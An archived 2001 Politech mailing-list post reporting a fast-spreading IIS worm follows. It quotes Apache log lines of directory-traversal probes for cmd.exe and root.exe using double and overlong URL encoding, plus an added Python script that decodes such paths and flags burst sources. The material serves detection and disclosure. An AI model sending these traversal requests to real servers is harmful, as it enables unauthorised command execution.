Politech mailing list archives

FC: Voracious, nasty new "Code Red" worm may be spreading quickly


From: Declan McCullagh <declan () well com>
Date: Tue, 18 Sep 2001 11:48:07 -0400

[BTW I'm seeing similar attempts on Politech's website. Remember, folks, Code Red and its progeny only infect Windows systems. --Declan]

**********

Date: Tue, 18 Sep 2001 11:34:26 -0400
From: Rich Kulawiec <rsk () firemountain net>
To: Declan McCullagh <declan () well com>
Subject: It would appear that a 'Code Red' worm variant is in the wild

I'm seeing reports on nanog, inet-access, and isp-webhosting about this;
a fast look at my own web servers indicates that it's real, and that
the hits are coming at a ferocious rate.  (I would guesstimate at 10x
the rate at which Code Red hit.)  This seems to have started within
the last few hours; the first entry in my logs is from 0930 EDT today.

Here's a snippet from the Apache error log; this appears to constitute
the signature of this worm:

A.B.C.D - - [18/Sep/2001:11:30:11 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 270
A.B.C.D - - [18/Sep/2001:11:30:11 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 268
A.B.C.D - - [18/Sep/2001:11:30:11 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
A.B.C.D - - [18/Sep/2001:11:30:11 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
A.B.C.D - - [18/Sep/2001:11:30:12 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
A.B.C.D - - [18/Sep/2001:11:30:12 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
A.B.C.D - - [18/Sep/2001:11:30:12 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
A.B.C.D - - [18/Sep/2001:11:30:12 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
A.B.C.D - - [18/Sep/2001:11:30:13 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
A.B.C.D - - [18/Sep/2001:11:30:16 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
A.B.C.D - - [18/Sep/2001:11:30:16 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
A.B.C.D - - [18/Sep/2001:11:30:16 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
A.B.C.D - - [18/Sep/2001:11:30:17 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
A.B.C.D - - [18/Sep/2001:11:30:17 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
A.B.C.D - - [18/Sep/2001:11:30:17 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
A.B.C.D - - [18/Sep/2001:11:30:18 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292

So far, all hits have come in groups of 16 and appear to be directed at
exploiting a vulnerability that's presumably found on Windows systems
running IIS.  They also *seem* to be largely localized, that is, the
IP addresses of the incoming probes are related to the IP addresses of
the systems being targeted.

The sad part about this is that chunks of the 'net are already bottlenecked
under the load caused by the past weeks' events and the attempts to
disseminate information about them, including photos of missing persons, etc.

---Rsk
Rich Kulawiec
rsk () firemountain net
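The log snippet above is the whole signature a web server administrator gets to work with: sixteen requests for root.exe or cmd.exe, most of them hiding the "../" with double percent-encoding (%255c), broken percent-encoding (%%35%63) or overlong UTF-8 (%c0%af, %c1%1c), fired in a burst from one source. The following script is an added example, not code from the original message or from Politech; it canonicalises each request path the way an IIS of that era would have (iterated percent-decoding plus the overlong-UTF-8 separators), flags hits on those binaries, and reports source hosts that fired a burst of probes inside a short window. The log lines it runs on are constructed (documentation-range addresses 192.0.2.10 and 198.51.100.7 stand in for the A.B.C.D of the original), and the burst threshold of four probes in sixty seconds is an assumed tuning value.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Constructed sample in Apache common log format, modelled on the probe
# pattern from the message above plus two benign requests from another host.
SAMPLE_LOG = """\
192.0.2.10 - - [18/Sep/2001:11:30:11 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 270
192.0.2.10 - - [18/Sep/2001:11:30:11 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
192.0.2.10 - - [18/Sep/2001:11:30:12 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
192.0.2.10 - - [18/Sep/2001:11:30:16 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
192.0.2.10 - - [18/Sep/2001:11:30:17 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
192.0.2.10 - - [18/Sep/2001:11:30:18 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
198.51.100.7 - - [18/Sep/2001:11:31:02 -0400] "GET /index.html HTTP/1.0" 200 1043
198.51.100.7 - - [18/Sep/2001:11:31:05 -0400] "GET /images/logo.gif HTTP/1.0" 200 5120
"""

# host ident user [time] "method path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Overlong / invalid UTF-8 byte pairs that old IIS builds decoded to a path
# separator *after* the ".." check had already run. Mapping assumed for the
# four forms that appear in the log above.
OVERLONG = {"%c0%af": "/", "%c0%2f": "/", "%c1%1c": "\\", "%c1%9c": "\\"}

TARGET_BINARIES = ("cmd.exe", "root.exe")


def normalize(path):
    """Canonicalise a request path the way the vulnerable decoder would.

    Lower-cases, maps overlong UTF-8 to separators, percent-decodes up to
    three times (so %255c -> %5c -> '\\' and %%35%63 -> %5c -> '\\'), and
    folds backslashes into forward slashes.
    """
    p = path.lower()
    for enc, sep in OVERLONG.items():
        p = p.replace(enc, sep)
    prev = None
    for _ in range(3):          # bounded: the log shows at most triple encoding
        if p == prev:
            break
        prev = p
        p = unquote(p)
    return p.replace("\\", "/")


def parse_line(line):
    """Parse one common-log-format line; return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def classify(path):
    """None for benign, 'direct' for a straight hit on a target binary,
    'traversal' when the canonical path climbs out of the web root."""
    norm = normalize(path.split("?", 1)[0])
    if not norm.endswith(TARGET_BINARIES):
        return None
    return "traversal" if "/../" in norm else "direct"


def find_probes(log_text):
    """Return one record per request that targets cmd.exe or root.exe."""
    probes = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        kind = classify(rec["path"])
        if kind:
            probes.append({"host": rec["host"], "time": rec["time"],
                           "kind": kind, "path": rec["path"],
                           "status": rec["status"]})
    return probes


def scanning_hosts(probes, min_probes=4, window_seconds=60):
    """Hosts that fired at least min_probes probes within window_seconds.

    The message reports hits arriving in groups of 16 within seconds; the
    burst rule separates that from a lone stray request. Returns
    {host: total probe count}.
    """
    by_host = defaultdict(list)
    for p in probes:
        by_host[p["host"]].append(p["time"])
    flagged = {}
    for host, times in by_host.items():
        times.sort()
        for i in range(len(times) - min_probes + 1):
            span = (times[i + min_probes - 1] - times[i]).total_seconds()
            if span <= window_seconds:
                flagged[host] = len(times)
                break
    return flagged


if __name__ == "__main__":
    found = find_probes(SAMPLE_LOG)
    for p in found:
        print(p["host"], p["time"].time(), p["kind"], p["status"], p["path"])
    print("burst sources:", scanning_hosts(found))
```

The status column is deliberately ignored when classifying: the 400 responses to the malformed %%35%63 requests are just as much part of the signature as the 404s, and on a server where the path actually resolves the response would be 200. Matching on the decoded target rather than on any one encoding is what keeps the rule valid across the whole group of sixteen.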



-------------------------------------------------------------------------
POLITECH -- Declan McCullagh's politics and technology mailing list
You may redistribute this message freely if you include this notice.
Declan McCullagh's photographs are at http://www.mccullagh.org/
To subscribe to Politech: http://www.politechbot.com/info/subscribe.html
This message is archived at http://www.politechbot.com/
-------------------------------------------------------------------------

